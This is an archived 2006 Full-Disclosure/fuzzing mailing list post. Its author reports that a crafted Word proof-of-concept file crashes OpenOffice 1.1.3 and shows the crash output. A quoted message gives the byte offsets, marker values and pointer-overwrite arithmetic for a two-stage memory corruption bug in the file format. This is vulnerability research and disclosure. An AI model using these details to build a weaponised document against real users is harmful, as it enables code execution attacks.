lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 12 Dec 2006 19:44:38 +0100
From: Joxean Koret <>
To: Disco Jonny <>
Cc: Full Disclosure <>,
	Fuzzing List <>,, "L. M. H" <>
Subject: Re: [fuzzing] OWASP Fuzzing page

Wow! That's fun! The so called "Word 0 day" flaw also affects! At least, 1.1.3. And, oh! Abiword does something cool
with the file:

joxean@...eankoret $ abiword 12122006-djtest.doc

** (AbiWord-2.2:24313): WARNING **: Invalid seek

** (AbiWord-2.2:24313): WARNING **: Invalid seek

** (AbiWord-2.2:24313): WARNING **: Invalid seek

** (AbiWord-2.2:24313): WARNING **: Invalid seek
joxean@...eankoret $ ooffice 12122006-djtest.doc lockfile found (/home/joxean/.openoffice/1.1.3/.lock)
Using existing
Application Errorsh: line 1: crash_report: command not found
Application Error

Fatal exception: Signal 6

I'm using 1.1.3 (Distributed with Debian Sarge 3.1). I
will play a little with the POC to view if it affects OOffice in a way
that code execution is possible.

Joxean Koret

> for something a little more technical
> This is an email I sent someone else. (sorry mate, ill give a few
> other ones for the 'project' :) )
> I do not know of any fuzzer that would find this.  I do not know of
> any fuzzing method, except the one I use that would find this.
> =====
> The file I have attached is a very basic two stage bug.  stage 1 (the
> first mod) forces the code down a wrong path.  the second mod by
> itsself is harmless, however when used with the first it will be the
> first and part of the second overwrite.
> I have use 41414141 as a marker to make it easier for you to see.
> I have made it crash the wordviewer again to make it more obvious
> Weight,
> location: 00000274
> value   : 00000022 - just so it crashes, values 00000001 -> 00000006
> are probably the most useful for trying to overwrite a pointer. notice
> that neighbouring areas can be weighted the same.
> marker,
> location: 000027e4
> value   : 41414141
> the weight destination address == ((weight * 4[this is EDI]) + 4
> [ECX*4]) + source memory offest[ESI].
> [also the meta data is microsofts, not mine]
> ======
> bug hugs,
> disco.
> _______________________________________________
> fuzzing mailing list
Agian, agian, egün batez
jeikiko dira egiazko Ziberotarrak,
egiazko eüskaldünak,
tirano arrotzen hiltzeko 
eta gure aiten aitek ützi daikien 
lurraren popüliari erremetitzeko.

Download attachment "signature.asc" of type "application/pgp-signature" (190 bytes)

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

Powered by blists - more mailing lists